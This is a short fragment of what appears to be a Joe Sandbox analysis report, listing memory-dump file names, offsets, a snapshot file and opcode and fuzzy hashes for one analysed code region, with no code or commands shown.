                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: df7cd0286099ddbbb1431baa0308ad07cebe5859e7a0c3a33846d33f9fc9174a
                                                                                                                                                                          • Instruction ID: 1d2e7c4291234b698fe1d5c1364e4ae04d16a46ed35700552e1cef730670d99f
                                                                                                                                                                          • Opcode Fuzzy Hash: df7cd0286099ddbbb1431baa0308ad07cebe5859e7a0c3a33846d33f9fc9174a
                                                                                                                                                                          • Instruction Fuzzy Hash: 8001EC3190420ECFEF659F64C1497DD77E1FF25311F000618D8828AA91D7BA0CA5CF69